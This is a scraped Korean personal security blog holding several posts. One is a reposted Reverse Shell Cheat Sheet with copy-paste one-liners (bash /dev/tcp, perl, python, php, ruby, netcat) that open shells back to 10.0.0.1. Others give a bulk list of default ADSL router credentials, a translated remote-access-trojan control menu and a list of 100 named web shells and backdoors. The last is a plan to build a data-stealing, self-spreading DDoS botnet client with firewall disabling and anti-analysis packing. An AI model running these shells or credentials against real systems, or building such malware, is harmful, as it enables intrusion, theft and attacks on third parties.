반응형
区段
====
.text 代码段,可以被读取,可以被执行
.rdata 存放只读数据(字符串字面值,常量以及调试目录信息)
.data 数据区段除了上面的static变量,还有存储在堆栈段的自动变量,其他所有变量都在.data里,典型的有各类全局变量
.idata 输入的dll函数信息
.edata 输出函数用的
.rsrc 文件资源节
.reloc 重定位区段(基址重定位表)
.mackt 是Import Reconstructor修复输入表时候添加的节

http://xdarkr.blog.163.com/blog/static/1681157042010730104421511/

반응형

'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

구글 봇탐지 기술..?  (0) 2012.02.12
휘슬(WHISTL) 2탄~  (4) 2012.01.09
중국어 번역. RAT  (0) 2011.12.06
部分ADSL路由器默认帐号密码  (0) 2011.12.05
[펌]Reverse Shell Cheat Sheet  (0) 2011.09.28
반응형
波尔远程控制
被控端 주인    
生成被控端 호스트 생성
置默被控端图标 기본 호스트 아이콘 설정
动连接被控端 수동 호스트 연결
批量更新被控端 일괄 호스트 업데이트
更新被控端接地址 업데이트 호스트 연결 주소
(重新接) 연결 끊기 (다시 연결)
关闭被控端 호스트 종료
卸載被控端 호스트 제거
筛选 필터
磁盘 디스크    
文件管理 디스크 파일 관리
络计算机 네트워크 컴퓨터
화면    
实时操作 화면 실시간 운영
자동 스크린샷
播放 애니메이션
停止播放 재생 중지
播放所有被控端 모든 호스트에 대해 애니메이션 반복
送全屏画 전체화면 보내기
关闭屏画 전체화면 닫기
체계    
程管理器 프로세스 관리
编辑 레지스트리 편집기
系统管理 서비스 관리 시스템
行DOS命令 DOS 명령 실행
注销 끄기 (로그아웃)
重新启动 다시 시작
关闭计算机 컴퓨터 종료
系统信息 시스템 정보
窗口    
前窗口列表 현재 윈도우 목록
页浏览历录 (비활성화) 기록된 웹 검색 기록
URL 열기
기타    
操作所有被控端 모든 호스트에 대한 작업
摄像头监控 감시카메라
风监听 (BETA) 마이크 모니터링
信息框 정보 상자
播放WAV MID WAV 방송
停止音乐播放 음악 플레이 중지
出光 CD-ROM 열기
关闭 CD-ROM 닫기
程序 프로그램    
设置主机各标识 로고의 호스트를 설정합니다
分组设置 그룹 설정
系统设 시스템 설정
动态域名 동적 도메인네임 (DDNS)
FTP自动更新IP FTP 자동업데이트 IP
接代理服 프록시 서버 연결
重新启动 서비스 재시작
本机被控端检测 로컬 호스트 탐지
看操作日志 작업 로그 확인
置主界面皮 주 인터페이스 스킨
置透明度 설정 투명성
访问 제작 웹사이트 방문
도움
演示和常见问题 애니메이션 및 FAQ
등록
更新 업데이트 확인
프로그램 정보
반응형
반응형
艾玛 701g
192.168.101.1 192.168.0.1
用户名:admin 密码:admin
用户名:SZIM 密码:SZIM
艾玛701H
192.168.1.1 10.0.0.2
用户名:admin 密码:epicrouter
home gateway
路由的IP是:10.0.0.2
管理名:admin 密:epicrouter
实达2110EH ROUTER
192.168.10.1
用户名:user 密码:password
用户名:root 密码:grouter
神州数码/华硕:
用户名:adsl 密码:adsl1234
全向:
用户名:root 密码:root
普天:
用户名:admin 密码:dare
e-tek
用户名:admin 密码:12345
zyxel
用户名:anonymous 密码:1234
北电
用户名:anonymous 密码:12345
大恒
用户名:admin 密码:admin
大唐
用户名:admin 密码:1234
斯威特
用户名:root 密码:root
用户名:user 密码:user

中兴
用户名:adsl 密码:adsl831
(中兴的adsl的密码前面为adsl,后面为型号,比如中兴831,密码就是adsl831)
磊科2505+NR
用户名:guest 密码:guest
友讯D-link DI504 DI604
用户名:admin 没有密码
1、全向QL1680
IP地址10.0.0.2,用户名:admin,密码:qxcomm1680,管理员密码:qxcommsupport。全向
QL1880 IP地址192.168.1.1,用户名:root,密码:root 全向QL1688
IP地址10.0.0.2,用户名为admin;密码为qxcomm1688
2、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin
3、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234
4、Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root
5、神州数码6010RA,在IE输入192.168.1.1 用户名为ADSL,密码为ADSL1234
6、华为SmartAX
MT800的初始IP是192.168.1.1,用户名和密码都为ADMIN,恢复默认配置的方法有两种,一种是连续按MODEM背后的RESET键三次,另一种是在配置菜单的SAVE&REBOOT里选择恢复默认配置。

7、伊泰克:IP:192.168.1.1 用户名:supervisor 密码:12345
8、华硕IP:192.168.1.1 用户名:adsl 密码:adsl1234
9、阿尔卡特 192.168.1.1 一般没有密码
10、同维DSL699E 192.168.1.1 用户名:ROOT 密码:ROOT
11、大亚DB102 192.168.1.1 用户名:admin 密码:dare
高级设置://192.168.1.1/doc/index1.htm
12、WST的RT1080 192.168.0.1 username:root password:root
13、WST的ART18CX 10.0.0.2 username:admin password:conexant
username:user
password:password
14、实达V3.2 root root V5.4 root grouter
15、泛德 admin conexant
16、东信Ea700 192.168.1.1用户名:空 密码:password
17、broadmax的hsa300a 192.168.0.1 username:broadmax
password:broadmax
18、长虹ch-500E 192.168.1.1 username:root password:root
19、重庆普天CP ADSL03 192.168.1.1 username:root password:root
20、台湾突破EA110 RS232:38400 192.168.7.1 usernameSL pswSL
21、etek-td的ADSL_T07L006.0 192.168.1.1 User Name: supervisor
Password: 12345 忘记密码的解决办法:
使用超级终端的Xmodem方式重写Vxworks.dlf,密码恢复成:12345
22、GVC的DSL-802E/R3A 10.0.0.2 username:admin
password:epicrouter username:user
password:password
23、科迈易通km300A-1 192.168.1.1 username: password:password
科迈易通km300A-G 192.168.1.1
username:root password:root 科迈易通km300A-A 192.168.1.1
username:root or admin
password:123456
24、sunrise的SR-DSL-AE 192.168.1.1 username:admin password:0000
sunrise的DSL-802E_R3A 10.0.0.2 username:admin
password:epicrouter username:user
password:password
25、UTStar的ut-300R 192.168.1.1 username:root or admin
password:utstar
반응형

'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

[펌] 常见区段 (일반섹션? 섹션 정보)  (4) 2011.12.06
중국어 번역. RAT  (0) 2011.12.06
[펌]Reverse Shell Cheat Sheet  (0) 2011.09.28
Compilation of wordlist downloads  (0) 2011.02.10
윈도우 DLL  (0) 2011.02.09
반응형
AET - 어드벤스드.. 뭐더라.. -_-ㅋ

암튼 뭐 그렇데요.. 지능적 회피인가 뭔가..

보안장비들 마다 특징이 있겠지만.. 참.. 재밌는 거리가 많더라고요

쉽게 생각하면 쉬울 수 있고.. 어렵게 생각하면 어려운 문제라는 걸 깨닫게 된 좋은 계기였다고 생각합니다.

저도 이것저것 좀 다양하게 생각하면서 창의적으로 생각하는게 중요한거 같습니다. ^^

SelSelectect your choice.

^^

반응형

'작업공간 > Security' 카테고리의 다른 글

Unpack  (0) 2011.12.29
Memory String  (0) 2011.12.29
TOP 100 Shells  (0) 2011.07.06
코어덤프 확인 및 생성방법  (2) 2011.06.20
[펌] OSI 7Layer  (0) 2011.06.12
반응형
개인적으로 IOS 5.0으로 업그레이드에 대해서 상당히 부정적인 생각을 가지고 있었다.
이유인 즉슨............

- 사진 위치 표시 안됨.

이라는 이유 때문이였다.. 다들 알다시피.. 아이폰에서 불법적으로 위치정보를 저장해놓은 사건 이후로 이 기능을 제외하는 것으로 알고 있었다.

IOS 5.0 리뷰글들을 봐도.. 사진 위치 정보가 이제는 표시 안된다는 식의 글밖에 없다.

위의 이유 말고도.. 탈옥 여부도 있었지만..
탈옥이야 뭐.. 한달내로 나올꺼같기도 하고..
새로 나온 OS에 대한 막연한 기대감으로 인해 설치를 감행하였다.

하지만.. 이게 뭔가요..


음?? 장소라는 탭이 존재하네요..?

얼래?? 기존에 있던 리뷰에서는 분명히 사진의 위치가 표시되지 않는다고 했는데..?




이런.. 맙소사.................
설치 안해봤으면 후회할뻔 했습니다..
저는 파워블로거들이 남긴 리뷰를 보고.. 파닥파닥 낚일뻔했네요.. ^^;

정상적으로 사진파일의 위치가 나오게 됩니다.
저처럼 고민을 하시는 분들이 계실까봐 글 남겨놓습니다. ^^



ps. 혹시.. 제가 버그일지도 모르니.. 하시고 나서,, 제 탓하지마세요.. ㅋ;;;
   설치하신분들 중에서도 위치가 나오시는 분들 답변 달아주세요.. 제가 버그인지 아닌지.. ㅎ




반응형

'My Life' 카테고리의 다른 글

FM2012 예판 도착  (9) 2011.12.15
면접.  (2) 2011.12.07
프로그래밍 설계  (0) 2011.05.08
Bye CCNA  (3) 2011.05.06
나.  (0) 2011.01.05
반응형

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.

Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL revere shell here.

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

Further Reading

Also check out Bernardo’s Reverse Shell One-Liners. He has some alternative approaches and doesn’t rely on /bin/sh for his Ruby reverse shell.

There’s a reverse shell written in gawk over here. Gawk is not something that I’ve ever used myself. However, it seems to get installed by default quite often, so is exactly the sort of language pentesters might want to use for reverse shells.

Tags: , , , , , , , , ,

Posted in Shells


출처 : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

반응형

'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

중국어 번역. RAT  (0) 2011.12.06
部分ADSL路由器默认帐号密码  (0) 2011.12.05
Compilation of wordlist downloads  (0) 2011.02.10
윈도우 DLL  (0) 2011.02.09
리눅스 동적 라이브러리 분석  (0) 2011.01.27
반응형
출처 : http://malwarelab.tistory.com/147

웹은 딱히 내 취향은 아니지만.. 공부공부!!
웹쉘 100개..
시간날때 하나씩 구해서 해봐야지..
언젠간 도움이 되거찌~~~~ +_+;;
(근데 어서 구하지? -_-ㅋㅋ)

C99Shell v. 1.0 beta (5.02.2005)  PHP   
Cyber Shell  PHP   
GFS Web-Shell  PHP   
NFM 1.8  PHP   
r57shell  PHP   
Small Web Shell by ZaCo  PHP   
nsTView v2.1  PHP   
DxShell v1.0  PHP   
C99madShell v. 2.0 madnet edition  PHP   
CTT Shell  PHP   
GRP WebShell 2.0 release build 2018 (C)2006,Great  PHP   
Crystal shell  PHP   
Loaderz WEB Shell  PHP   
NIX REMOTE WEB SHELL  PHP   
Antichat Shell  PHP   
CasuS 1.5  PHP   
Sincap 1.0  PHP   
C99Shell v. 1.0 pre-release build(safe-mode)  PHP   
hiddens shell v1  PHP   
Web-shell (c)ShAnKaR  PHP   
Predator  PHP   
KA_uShell 0.1.6  PHP   
NGH  PHP   
C2007Shell v. 1.0 pre-release build #16 Modded by Adora & u9 h4c93r  PHP   
Antichat Shell. Modified by Go0o$E  PHP   
c0derz shell [csh] v. 0.1.1 release  PHP   
iMHaBiRLiGi Php FTP  PHP   
PHVayv  PHP   
phpRemoteView  PHP   
STNC WebShell v0.8  PHP   
MyShell  PHP   
ZyklonShell  PHP   
AK-74 Security Team Web Shell Beta Version PHP   
Gamma Web Shell  Perl-Cgi   
go-shell  Perl-Cgi   
PhpSpy Ver 2006 Perl-Cgi   
CmdAsp.asp.txt  ASP   
CyberSpy5.Asp.txt  ASP   
klasvayv.asp.txt  ASP   
indexer.asp.txt  ASP   
NTDaddy v1.9  ASP   
reader.asp.txt  ASP   
RemExp.asp.txt  ASP   
zehir4.asp.txt  ASP   
Elmaliseker.txt  ASP   
EFSO_2.txt  ASP   
accept_language  PHP   
Ajax_PHP Command Shell  PHP   
Antichat Shell v1.3  PHP   
Ayyildiz Tim -AYT- Shell v 2.1 Biz  PHP   
aZRaiLPhp v1.0  PHP   
backupsql  PHP   
c99  PHP   
c99_locus7s  PHP   
c99_madnet  PHP   
c99_PSych0  PHP   
c99_w4cking  PHP   
Crystal  PHP   
ctt_sh  PHP   
cybershell  PHP   
dC3 Security Crew Shell PRiV  PHP   
Dive Shell 1.0 - Emperor Hacking Team  PHP   
DTool Pro  PHP   
Dx  PHP   
GFS web-shell ver 3.1.7 - PRiV8  PHP   
gfs_sh  PHP   
h4ntu shell [powered by tsoi]  PHP   
iMHaPFtp  PHP   
ironshell  PHP   
JspWebshell 1.2  PHP   
KAdot Universal Shell v0.1.6  PHP   
lamashell  PHP   
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit  PHP   
load_shell  PHP   
matamu  PHP   
Moroccan Spamers Ma-EditioN By GhOsT  PHP   
myshell  PHP   
Mysql interface v1.0  PHP   
MySQL Web Interface Version 0.8  PHP   
mysql  PHP   
mysql_tool  PHP   
NCC-Shell  PHP   
NetworkFileManagerPHP  PHP   
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version  PHP   
nshell  PHP   
nstview  PHP   
PH Vayv  PHP   
PHANTASMA  PHP   
PHP Shell  PHP   
php-backdoor  PHP   
php-include-w-shell  PHP   
pHpINJ  PHP   
PHPJackal  PHP   
PHPRemoteView  PHP   
Private-i3lue  PHP   
pws  PHP   
r57  PHP   
r57_iFX  PHP   
r57_kartal  PHP   
r57_Mohajer22  PHP   
rootshell  PHP   
ru24_post_sh  PHP   
s72 Shell v1.1 Coding  PHP   
Safe0ver Shell -Safe Mod Bypass By Evilc0der  PHP   
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2  PHP   
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend  PHP   
simple_cmd  PHP   
simple-backdoor  PHP   
SimShell 1.0 - Simorgh Security MGZ  PHP   
SnIpEr_SA Shell  PHP   
Uploader  PHP   
WinX Shell  PHP   
Worse Linux Shell  PHP   
zacosmall PHP   
Antichat Shell v1.3 PHP   
Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP   
aZRaiLPhp v1.0 PHP   
CrystalShell v.1 PHP   
Cyber Shell (v 1.0) PHP   
dC3 Security Crew Shell PRiV PHP   
Dive Shell 1.0 - Emperor Hacking Team PHP   
DxShell.1.0 PHP   
ELMALISEKER Backd00r ASP   
GFS web-shell ver 3.1.7 - PRiV8 PHP   
h4ntu shell [powered by tsoi] PHP   
JspWebshell 1.2 JSP   
KAdot Universal Shell v0.1.6 PHP   
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP   
Macker's Private PHPShell PHP   
Mysql interface v1.0 PHP   
MySQL Web Interface Version 0.8 PHP   
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP   
Perl Web Shell by RST-GHC PL   
Private-i3lue PHP   
RedhatC99 [login=redhat-pass=root] PHP   
Rootshell.v.1.0 PHP   
s72 Shell v1.1 Coding PHP   
Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP   
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP   
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP   
SimShell 1.0 - Simorgh Security MGZs PHP   
WinX Shell PHP   
Worse Linux Shell PHP
반응형

'작업공간 > Security' 카테고리의 다른 글

Memory String  (0) 2011.12.29
AET  (0) 2011.10.31
코어덤프 확인 및 생성방법  (2) 2011.06.20
[펌] OSI 7Layer  (0) 2011.06.12
gdb 단축키  (0) 2011.06.02
반응형
레지스트리 등록하는 부분은 완성!!

서비스 등록하는 부분은 미완성!!

차라리 악성코드 IDA로 열어서 헥스레이로 본 코드를 넣는게 빠를려나;;;

악성코드를 열어서 코드 확인하는건.. 고민을 해봐야겠다;; ㅠㅠ

아무튼 2주차는 50% 성공 ㅠㅠ

평일날 마져 채워야되는데..

이번주는 좀 바쁨..ㅠㅠ

반응형
반응형
코어덤프를 이용하는 이유
코어덤프를 이용할 시, 버그상황을 재현하지 않고도 디버깅이 가능하다는 장점이 있음.

코어덤프 형식
%t = <코어덤프한 시각>
%e = <프로세스 명>
%p = <PID>
%c = <코어덤프 최대크기>


코어덤프 확인
root@bt:/# ulimit -c
0                                      //여기서 0은 코어덤프의 생성 크기를 이야기 함.

코어덤프 생성방법
root@bt:/# ulimit -c unlimited
root@bt:/# ulimit -c
unlimited                           //여기서 unlimited는 생성 크기를 제한하지 않는다는 것을 의미


코어파일을 이용한 디버깅 방법
gdb -c <corefilename> <실행파일 이름>



반응형

'작업공간 > Security' 카테고리의 다른 글

AET  (0) 2011.10.31
TOP 100 Shells  (0) 2011.07.06
[펌] OSI 7Layer  (0) 2011.06.12
gdb 단축키  (0) 2011.06.02
ZEUS 2.0.8.9 Source Code  (0) 2011.05.16
반응형
갇힌 공간에 답답하게 있다보니 오랜만에 공부를 좀 했습니다;;

API도 다 까먹었었는데.. 기본 구조라던가.. 메시지 전달하는 방법들에 대해서 간략하게 코딩하면서 기억을 되살려보고..

사실.. 네트워크 프로그래밍은 한번도 해본적이 없어서.. 이번에 악성코드를 하나 만들어보면서 공부를 하려고 준비중입니다. +_+

기본적인 구조는 Win32/Trojan.Downloader 형태이나, 조금 더 나가서 DDoS Agent 형태로 만들어 볼까 계획중인데... 괜츈하겠죵? 홍홍홍..

일단 이번주는 Server 프로그램과 Client 프로그램 기본적인 틀만 갖추어놨고.. 다음주에는 좀 더 제대로 구조를 갖출 예정입니다.


예정사항
1주차 : 기본구조 설계 및 이해 (이번주 완료)
2주차 : Client : 개인정보 추출 및 Server로 전달 / Registry를 통한 자동실행 기법 구현
3주차 : Server : 받은 정보 저장 (웹서버 구축? 귀찮으면 그냥 BackTrack 활용)
                       좀비PC 현황 (IP 및 활성화 여부 파악)
           Client : Registry를 통한 방화벽 해제
4주차 : Server : Client로 명령어 하달 (초반에는 간단하게 Download만)
          Client : 명령별 분기문 및 기능구현 (Download 받고 실행까지)
5주차 : 명령어 추가 (DDoS 명령, Syn Flooding, UDP Flooding)
6주차 : 5주차에 이어 계속...

7주차 : 전파 구현 (SMB를 통한 전파)
8주차 : 전파 구현 (Email 수집을 통한 전파)

9~10주차 : 7~8주차 연장선.

11주차 : 완료.



장작.. 3달간의 길고긴 프로젝트 =_=;;
마지막엔 안티디버깅 기법이랑.. 패킹기법 좀 공부해서 자체패킹시켜보고...
마지막으로.. VirusTotal과 백신업체에 보내보는거예욧!!!!!!

등록되면 땡큐.. 안되면 뭐.. 어짜피 학습용도로 만든거라 악성코드도 아닌데 뭐.. +_=  라고 생각하고 있습니다.. 풀헐헐헐ㄹㄹㄹㄹ

이게 완료가 되면.. Download 할.. 키로거 하나 만들어보던가.. 기존에 있는 악성코드들 소스를 좀 끌어다가 하나 만들어봐야겠습니다 +_+





메시지 처리구조
1. 감염된 좀비PC가 C&C로 자신의 개인정보를 보냄.            좀->C&C
2. C&C는 좀비PC에게 명령을 하달                                    C&C->좀
3. 좀비PC는 주기적으로 C&C에게 정보를 전달하며
    전달받은 명령을 수행                                                   좀->C&C
4. 어느정도 공격을 수행한 이후, 나도 하드파괴?? ㅋ              C&C->좀
반응형

'작업공간' 카테고리의 다른 글

2주차 결과  (0) 2011.06.21
Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit  (0) 2010.02.23

+ Recent posts